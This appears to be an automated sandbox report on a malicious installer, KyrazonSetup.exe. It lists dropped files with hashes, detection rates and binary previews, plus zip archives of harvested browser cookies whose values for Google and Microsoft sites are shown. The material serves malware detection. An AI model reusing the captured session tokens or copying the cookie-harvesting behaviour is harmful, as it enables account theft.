                                                                                    SHA-512:566F12212B7A3CA1AD1184BD0CB6DF9552A4600BE36FA0C9632681A68C6FEA20068A09E160C404AB31468448DB10308E6B2C3424515F02E5C25EC7BF2F250F02
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........."......0o..f......p.j........@..........................................`.............................................9D......T....pw.....`2.0.D...........y..x...k.......................e..(....]o.@...........h...X...hr..`....................text...e/o......0o................. ..`.rdata..x.}..@o...~..4o.............@..@.data.....E..@.......4..............@....pdata..0.D..`2.. D..,..............@..@.00cfg..0.....v......L:.............@..@.gxfg... C....v..D...N:.............@..@.retplne......v.......:..................rodata.......v.......:............. ..`.tls..........w.......:.............@...CPADinfo8.... w.......:.............@...LZMADEC......0w.......:............. ..`_RDATA..\....Pw.......:.............@..@malloc_h.....`w.......:............. ..`.rsrc.......pw.......:.............@..@.reloc...x....y..z...H<.............@..B................

                                                                                    C:\Users\user\AppData\Local\Programs\KyrazonGodot\chrome_100_percent.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):135642
                                                                                    Entropy (8bit):7.916363227461705
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:tezwJCGIekwf9W2bg3yhPaL2o418Gb0+VRLf0ld0GY3cQ3ERVm2I:tezw1Iek+42k3yMK18Gb0OV8ld0GecQJ
                                                                                    MD5:A0E681FDD4613E0FFF6FB8BF33A00EF1
                                                                                    SHA1:6789BACFE0B244AB6872BD3ACC1E92030276011E
                                                                                    SHA-256:86F6B8FFA8788603A433D425A4BC3C4031E5D394762FD53257B0D4B1CFB2FFA2
                                                                                    SHA-512:6F6A1A8BFE3D33F3FA5F6134DAC7CD8C017E38E5E2A75A93A958ADDBB17A601C5707D99A2AF67E52C0A3D5206142209703701CD3FAB44E0323A4553CAEE86196
                                                                                    Malicious:false
                                                                                    Preview:....................5...........r..........._.......................P.....J.................c!.....#....#......8.....;.....@....PC.....E.....G....8J....(L....XN.....R.....U..!..Y.."..Z..$..[..&..]..'..^....]_../.we..0..k..1./m..2..m.....n.....o.....q.....t....xw.....z.....~..........,...........................w.........0....{....@....C....y....v.......................................u"...K)....+.../...t3....=...!@...xH...]L....U...5`....pd.....f.....n....Lw....4x.....y.....{.....~....W.....l...........'...........b.......................`............................p................r.....w...0.|...1.<...2.....3.....4.$...5.....6....7.....8.....9.s...:....;.*...<.....=.r...>.`...?.x...@.~...A.8...C.....D.....E.....F.W...G.!...H.....I.....J.....K.....L.....O.....&.....'.....(.5...).....*.*...+.T...,.!...-.k........./.....0.Y...1.....2.....3.....4.....5.....6.!...7.....8.7...9.....:.P...<.....=.-...>.....?.....@.Y...A.....B.{...C.....D.-...E.....F...

                                                                                    C:\Users\user\AppData\Local\Programs\KyrazonGodot\chrome_200_percent.pak

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):195396
                                                                                    Entropy (8bit):7.94178165609805
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:ADQYaE/N6Mrvy/3JP29W2bg3yhPaafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+y:ADQYaSN6svyd242k3yxgx5GMRejnbdZR
                                                                                    MD5:C37BD7A6B677A37313B7ECC4FF01B6F5
                                                                                    SHA1:79DB970C44347BD3566CEFB6CABD1995E8E173DF
                                                                                    SHA-256:8C1AE81D19FD6323A02EB460E075E2F25ABA322BC7D46F2E6EDB1C4600E6537A
                                                                                    SHA-512:A7B07133FA05593B102A0E5E5788B29488CB74656C5EE25DE897C2BA2B2A7B05C0663ADE74A003F7D6DF2134D0B75F0AD25E15E9C9E0969E9453B7FC40B9F8BB
                                                                                    Malicious:false
                                                                                    Preview:....................<..........................................$.....).....,....N4.....8.....@.....D....;Y.....m.....s....y}.........e...........W...........>.....b.....k...!.%...".}...$.....&.....'........../.#...0.....1.(...2.......$...........9.....-.....2.....q...........d...................................m.........&F...qP...6S....W....a....c...ff....k....v...sx..................~....`....*............F....r............r.....................s...................................*.....E.................W.............................. ....5#....2*....P-....i4.....<....[?.....f.....g....bl..0.Eq..1.sr..2..t..3..u..4.lv..5..w..6.ry..7..z..8.v|..9..~..:.....;.I...<.7...=.....>.....?.....@.....A....C.....D.....E....F.....G.9...H.Z...I.N...J."...K....L.....O.D...&.>...'.....(.....).[...*.....+.<...,.....-.k........./.)...0.}...1.....2.....3.....4.r...5.....6.....7.$...8.....9.U...:.....<.....=.....>.....?.P...@.....A.k...B.,...C.....D.*...E.....F.$.

                                                                                    C:\Users\user\AppData\Local\Programs\KyrazonGodot\d3dcompiler_47.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):4916712
                                                                                    Entropy (8bit):6.398049523846958
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                    MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                    SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                    SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                    SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: Setup.exe, Detection: malicious, Browse
                                                                                    • Filename: UnifyX64.exe, Detection: malicious, Browse
                                                                                    • Filename: UnifyX64.exe, Detection: malicious, Browse
                                                                                    • Filename: WorldWars.exe, Detection: malicious, Browse
                                                                                    • Filename: WorldWars.exe, Detection: malicious, Browse
                                                                                    • Filename: TamenuV11.msi, Detection: malicious, Browse
                                                                                    • Filename: TamenuV5.2.exe, Detection: malicious, Browse
                                                                                    • Filename: TamenuV5.2.exe, Detection: malicious, Browse
                                                                                    • Filename: LisectAVT_2403002A_375.exe, Detection: malicious, Browse
                                                                                    • Filename: Setup 3.0.0.msi, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Programs\KyrazonGodot\ffmpeg.dll

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2887680
                                                                                    Entropy (8bit):6.7090688959107
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:9F5qb84KtStWEK/Ju2lf3tAtiLHQVTf6yfcrhCHDXLl8+0LKSQUSCu:9FvSkJXv+tiLAD0+DUS5
                                                                                    MD5:208E7AF956A0803900125BDC11A3ECF2
                                                                                    SHA1:1BD84174194485DA634BF8B3AF0A78E236316A8E
                                                                                    SHA-256:D863C8A26744703F2D12C674B45C87D8B34E21EFCE169D4797B57964D168B077
                                                                                    SHA-512:76937999A21391107D9EBCFD66C7A2CA967CC7CAC7AEB2B15BBECA6B546423A3D5C83969EF151C95D916D5A9F653573CD59D05110566D52A5C2679059C4D4EC3
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........." ......#.........p........................................PB...........`A........................................x)*....../*.(.............@...............B..4....).......................).(....B#.@............3*.P............................text...5.#.......#................. ..`.rdata..$....0#.......#.............@..@.data.........*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg... -....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....B.......+.............@..@.reloc...4....B..4....+.............@..B........................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Programs\KyrazonGodot\icudtl.dat

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):10717392
                                                                                    Entropy (8bit):6.282534560973548
                                                                                    Encrypted:false
                                                                                    SSDEEP:196608:hpgPBhORiuQwCliXUxbblHa93Whli6Z86WOH:n8wkDliXUxbblHa93Whli6Z8I
                                                                                    MD5:E0F1AD85C0933ECCE2E003A2C59AE726
                                                                                    SHA1:A8539FC5A233558EDFA264A34F7AF6187C3F0D4F
                                                                                    SHA-256:F5170AA2B388D23BEBF98784DD488A9BCB741470384A6A9A8D7A2638D768DEFB
                                                                                    SHA-512:714ED5AE44DFA4812081B8DE42401197C235A4FA05206597F4C7B4170DD37E8360CC75D176399B735C9AEC200F5B7D5C81C07B9AB58CBCA8DC08861C6814FB28
                                                                                    Malicious:false
                                                                                    Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html ......E.......E.......E..P/...E.../...E..P7...E...7...E...h...F...h.. F..Pi..0F......DF.....WF.....jF..P...}F.......F..`....F.......F.. ....F.......F..0....F.......G......G......(G.....;G..@...NG......aG.....tG.......G.......G..@....G.......G.......G.......G..P....G.......H.......H..P...2H......EH..`...UH......hH......yH..P....H.......H.......H..`....H.......H.......H..P....I.......I......-I..@...=I......PI......aI..@...uI.......I...0...I.. 1...I..p1...I...e...I...e...I...i...I..`i...J...i..)J...K..BJ..p...^J..."'.uJ..P.'..J....'..J...5'..J..06'..J...>'..J..P?'..K...D'..K...F'.0K...H'.IK...V'.hK....(..K....(..K..P.)..K....)..K..pW*..K..P.*..L...*+.?L..p.+.bL....+..L...U,..L....,..L....,..L....,..L..@.,..M....,.-M..P.-.IM.. e-.`M...e-.~M...R/..M.../..M..0.0..M..@.0..M..P.0..M....0..N....0.!N...,0.9N...,0.NN..0-0.fN...-0.vN...Y0..N...Z0..N..

                                                                                    C:\Users\user\AppData\Local\Temp\2714d126-6dff-4bf4-9f31-b75695222b09.tmp.node

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):140288
                                                                                    Entropy (8bit):6.055411992765344
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
                                                                                    MD5:04BFBFEC8DB966420FE4C7B85EBB506A
                                                                                    SHA1:939BB742A354A92E1DCD3661A62D69E48030A335
                                                                                    SHA-256:DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
                                                                                    SHA-512:4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..............C.......C.....C................................"...C...............................................Rich............................PE..d....-!e.........." ...#.>..........XG....................................................`.............................................X.......<....`.......0..$............p..........p...............................@............P..........@....................text...`=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....pdata..$....0......................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\5ec3d08a-7ef2-4ee9-8eab-fef225a068c8.tmp.node

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):140288
                                                                                    Entropy (8bit):6.055411992765344
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:94PTD6FEzMju6bzJKjpEPeTOKvJhEnww+YbRYvPuq:94jQju6b9KilKvJurR8W
                                                                                    MD5:04BFBFEC8DB966420FE4C7B85EBB506A
                                                                                    SHA1:939BB742A354A92E1DCD3661A62D69E48030A335
                                                                                    SHA-256:DA2172CE055FA47D6A0EA1C90654F530ABED33F69A74D52FAB06C4C7653B48FD
                                                                                    SHA-512:4EA97A9A120ED5BEE8638E0A69561C2159FC3769062D7102167B0E92B4F1A5C002A761BD104282425F6CEE8D0E39DBE7E12AD4E4A38570C3F90F31B65072DD65
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L..............C.......C.....C................................"...C...............................................Rich............................PE..d....-!e.........." ...#.>..........XG....................................................`.............................................X.......<....`.......0..$............p..........p...............................@............P..........@....................text...`=.......>.................. ..`.rdata.......P.......B..............@..@.data...............................@....pdata..$....0......................@..@_RDATA..\....P......................@..@.rsrc........`......................@..@.reloc.......p......................@..B................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\826b8686-c1e5-48d8-8e12-62caf060804a.tmp.node

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1892864
                                                                                    Entropy (8bit):6.574510854408502
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                                                                    MD5:66A65322C9D362A23CF3D3F7735D5430
                                                                                    SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                                                                    SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                                                                    SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c.zip

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:modified
                                                                                    Size (bytes):2688
                                                                                    Entropy (8bit):6.985395041051352
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:9NPOFmFnZYpjng0tOeS+c8Su2+2Y9JbwXn2PFv9ulOKwLKgpucbmOLoKWCyuc2:mFm3YtOeSPuiEWGtv9emKmu88VHu7
                                                                                    MD5:EFE25E25C2FBCF1B9FABAA03C23F798F
                                                                                    SHA1:B073FC9EAF465FCB7EC462D5E0DD00D7BB8E3B00
                                                                                    SHA-256:C57E3652F52D359DE134C9E0A00666DF7EAA0D81BCF729F58E5FAEA786AB28DD
                                                                                    SHA-512:5E776E52178FDB906EB0003D757546AE2CA71B92335BC905B080A5A2014162C5E3A6760F1B49C7AD5EA3958FD984755E8A82D70EDF638BF8E26742212B7B4724
                                                                                    Malicious:false
                                                                                    Preview:PK..........Y................Applications\PK..........Y................Browser Extensions\PK..........Y................Cookies\PK..........Yq..-............Cookies\Google_Default.txt...H....9..*.2!Y.....|...'6....Z...}Z.3....bX ..........\...u9.x[u.1.D.Wg.e...`x....x.6....3....C.........=...0...Bqus......u.#GCg."(_...1..&7..&...l.y....Z....M..8G..Z. ..(^C.T..-....bW.#.r..9....6..3...s..G..m.1.U.._....2........}.&.\w.].......D.......|u........:..5.......C....w{v'.*<..u.]...??.nHe..H<...*~..(K.J../.-.U..q..6/../q^+w..yR....Q.e.;9..L;...e..V.Mu..."*k....\..&ma.7..kh..8E.<N...kV..$....q...!7.m...../...K^.bE..u}/7{.q..p./K.`..?..D.D.....y...t.D'.oe....._Q.TQ....k.O.x.Wl..(.)...XW)M..p.....v.e'%e.^...Jy.$i..M..y.....cHS.r..!I(.QB1..........i.`.o...!..Y!F...p.X..c>......._.....}24.......0....8.X.....7..........c.F.D.....c......<[{....9..7%a...}<..'."P...H...1P4..".8 .?....<..[-.4.7.:.DW..../[.=..k9....U[2..'qy..gk.AW...2......".r./W.O.."v..q.K.t..9..

                                                                                    C:\Users\user\AppData\Local\Temp\8333d481-4ae4-4f2c-bcb9-7abf221f111c\Cookies\Google_Default.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:ASCII text, with very long lines (522)
                                                                                    Category:dropped
                                                                                    Size (bytes):3308
                                                                                    Entropy (8bit):5.836762246327351
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:7TJfocO2joccRhocZ8bJocofo3owoUv3uoNoWbooBoIo1Xp6oNsADoqwPoAcvsA9:Bj0RT2gJ
                                                                                    MD5:9CA2464D1CCB91DE27CE8CCB2A71226B
                                                                                    SHA1:B3105F3090B0783517A670F5A7200044E04BE8B1
                                                                                    SHA-256:4740FCC5D200692A093002F2B530CFA4C44508E10454CEFC494682D9A57EB8B8
                                                                                    SHA-512:9AAE4D487F3F4CB7E295A5A5EFE906FF977F3338D95D4797535EB05733B98EC46FE0A9A84859ADC06E4711EDD20FA9442E927D93616F98BA2541170D42BF18E6
                                                                                    Malicious:false
                                                                                    Preview:.google.com.TRUE./.FALSE.13355861278849698.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.FALSE.13355861278849698.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.TRUE./.FALSE.13355861278849698.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310

                                                                                    C:\Users\user\AppData\Local\Temp\aad38a22-07e7-47f5-a3a4-73babbf006a9.tmp.node

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):1892864
                                                                                    Entropy (8bit):6.574510854408502
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:lVtIA1xRrGLYLn9M+BMPPivsICK9rzoNEqt:7tH4X3inMZt
                                                                                    MD5:66A65322C9D362A23CF3D3F7735D5430
                                                                                    SHA1:ED59F3E4B0B16B759B866EF7293D26A1512B952E
                                                                                    SHA-256:F806F89DC41DDE00CA7124DC1E649BDC9B08FF2EFF5C891B764F3E5AEFA9548C
                                                                                    SHA-512:0A44D12852FC4C74658A49F886C4BC7C715C48A7CB5A3DCF40C9F1D305CA991DD2C2CB3D0B5FD070B307A8F331938C5213188CBB2D27D47737CC1C4F34A1EA21
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... ...!... ...!D.. ...!... ..!... ..!... ..!... ...!... ... ... .U.!... .U.!... .U. ... .U.!... Rich... ........PE..d...&..e.........." ...%.....6......,........................................@............`.........................................py.......y..(...............\............ ..4.......p...............................@...................\n..@....................text............................... ..`.rdata..^...........................@..@.data... f.......P...|..............@....pdata..\...........................@..@_RDATA..\...........................@..@.rsrc...............................@..@.reloc..4.... ......................@..B........................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3.zip

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                    Category:modified
                                                                                    Size (bytes):2688
                                                                                    Entropy (8bit):6.981542781401866
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:95zOFmFnZYpjng0tOeS+c8Su2+2Y9JbwXn2PFv9ulOKFwiuc3iOhMWruc+:OFm3YtOeSPuiEWGtv9eIiu0Rruz
                                                                                    MD5:9019FE74E4037041E9C6CAD35CE7B8B3
                                                                                    SHA1:C3B95832C44F033D3ABCBF10626C7F6E677428D9
                                                                                    SHA-256:98CCE0A362A87507BCB25BD7970301FD426B87A1C4585FF69992C67F56D638DB
                                                                                    SHA-512:C0E1DF4AD0C1C77E84A687CAD22B2BA4692CF2E142A6F333AEFB0D51C0ED848F4866279E3A9BE560D6618D232B4239AC891A19112978DB5DC8317B46563D4795
                                                                                    Malicious:false
                                                                                    Preview:PK..........Y................Applications\PK..........Y................Browser Extensions\PK..........Y................Cookies\PK..........Yq..-............Cookies\Google_Default.txt...H....9..*.2!Y.....|...'6....Z...}Z.3....bX ..........\...u9.x[u.1.D.Wg.e...`x....x.6....3....C.........=...0...Bqus......u.#GCg."(_...1..&7..&...l.y....Z....M..8G..Z. ..(^C.T..-....bW.#.r..9....6..3...s..G..m.1.U.._....2........}.&.\w.].......D.......|u........:..5.......C....w{v'.*<..u.]...??.nHe..H<...*~..(K.J../.-.U..q..6/../q^+w..yR....Q.e.;9..L;...e..V.Mu..."*k....\..&ma.7..kh..8E.<N...kV..$....q...!7.m...../...K^.bE..u}/7{.q..p./K.`..?..D.D.....y...t.D'.oe....._Q.TQ....k.O.x.Wl..(.)...XW)M..p.....v.e'%e.^...Jy.$i..M..y.....cHS.r..!I(.QB1..........i.`.o...!..Y!F...p.X..c>......._.....}24.......0....8.X.....7..........c.F.D.....c......<[{....9..7%a...}<..'."P...H...1P4..".8 .?....<..[-.4.7.:.DW..../[.=..k9....U[2..'qy..gk.AW...2......".r./W.O.."v..q.K.t..9..

                                                                                    C:\Users\user\AppData\Local\Temp\b199ef7f-44d4-4450-91be-cfb553031fa3\Cookies\Google_Default.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe
                                                                                    File Type:ASCII text, with very long lines (522)
                                                                                    Category:dropped
                                                                                    Size (bytes):3308
                                                                                    Entropy (8bit):5.836762246327351
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:7TJfocO2joccRhocZ8bJocofo3owoUv3uoNoWbooBoIo1Xp6oNsADoqwPoAcvsA9:Bj0RT2gJ
                                                                                    MD5:9CA2464D1CCB91DE27CE8CCB2A71226B
                                                                                    SHA1:B3105F3090B0783517A670F5A7200044E04BE8B1
                                                                                    SHA-256:4740FCC5D200692A093002F2B530CFA4C44508E10454CEFC494682D9A57EB8B8
                                                                                    SHA-512:9AAE4D487F3F4CB7E295A5A5EFE906FF977F3338D95D4797535EB05733B98EC46FE0A9A84859ADC06E4711EDD20FA9442E927D93616F98BA2541170D42BF18E6
                                                                                    Malicious:false
                                                                                    Preview:.google.com.TRUE./.FALSE.13355861278849698.NID.511=j8SQUTltnVU5cOAeyzqSxW-qHOakRuBHDQGLTGeceC9Z5rRzk5trMKb4CuZC_CFmc7KFwQcRJL-qGz8MvkkzMZmElvXAFWLO-TPZ9PMqBYA78ZAuaepnXIRHe-TAolVoW6Z7dQnqpgyX0m-TmS72bebAgoqZv5GkpRFUcZIw1Kk.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.AuthProvider.True.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.Correlation.mdRqPJxLbpyv7vX0eK9YkTR-xwcrW3VBLE4Y3HEvxuU.N.support.microsoft.com.TRUE./.FALSE.13355861278849698..AspNetCore.OpenIdConnect.Nonce.CfDJ8Kiuy_B5JgFMo7PeP95NLhqwcJ8koDy5pXkfoWsb5SbbU2hVCbsH2qt9GF_OVCqFkLEwhvzeADNQOF5RSmkDfh5RqfqlOkx5QWo4Lltvwb0CvwBFD8ujlm3BAglOeGca3ZatkLMUkHB6alahUr8qJ7G_3AejtooymTWCzyO89hshJeX8Gh78kohbIw0IQY4v6LZriT4P2fGeBSMjrvqODB4H_bs2nbfsSfL7aN-SiX4Yyn3iFo5fv-Rsj0cGE-FFrP1uXNT7Y1VSMOfm-L0RnS8.N.support.office.com.TRUE./.FALSE.13355861278849698.EXPID.8e067c40-5461-4aef-885f-2c92ce6a5474..microsoft.com.TRUE./.FALSE.13355861278849698.MC1.GUID=749eee6039c5489b9db3000c7ab3f399&HASH=749e&LV=202310

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\KyrazonGodot.exe

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):172671488
                                                                                    Entropy (8bit):6.736653382610154
                                                                                    Encrypted:false
                                                                                    SSDEEP:1572864:q3lB0RhDP7igv6wO+HkaN/xtpj56BZWua2T3jC0gqhd07YeRt6C1Bd1jKoUeKtQk:/Pvt1x2z5m1ij
                                                                                    MD5:EEB12AAC1FF31A9D17BA437700CAF9D6
                                                                                    SHA1:09AEDF44E30437BE57326C61570BE52930B0F001
                                                                                    SHA-256:BD4E25E01DE9EC86B4B55BDE68A59F196BA4AD2F0889F3CAF761A6D548027DD5
                                                                                    SHA-512:566F12212B7A3CA1AD1184BD0CB6DF9552A4600BE36FA0C9632681A68C6FEA20068A09E160C404AB31468448DB10308E6B2C3424515F02E5C25EC7BF2F250F02
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...6..e.........."......0o..f......p.j........@..........................................`.............................................9D......T....pw.....`2.0.D...........y..x...k.......................e..(....]o.@...........h...X...hr..`....................text...e/o......0o................. ..`.rdata..x.}..@o...~..4o.............@..@.data.....E..@.......4..............@....pdata..0.D..`2.. D..,..............@..@.00cfg..0.....v......L:.............@..@.gxfg... C....v..D...N:.............@..@.retplne......v.......:..................rodata.......v.......:............. ..`.tls..........w.......:.............@...CPADinfo8.... w.......:.............@...LZMADEC......0w.......:............. ..`_RDATA..\....Pw.......:.............@..@malloc_h.....`w.......:............. ..`.rsrc.......pw.......:.............@..@.reloc...x....y..z...H<.............@..B................

                                                                                    C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\LICENSE.electron.txt

                                                                                    Download File
                                                                                    Process:C:\Users\user\Desktop\KyrazonSetup.exe
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):1096
                                                                                    Entropy (8bit):5.13006727705212
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                    MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                    SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
